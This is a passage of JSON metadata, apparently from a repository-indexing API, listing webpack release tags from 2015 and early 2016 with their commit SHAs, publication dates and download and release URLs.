ub.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpac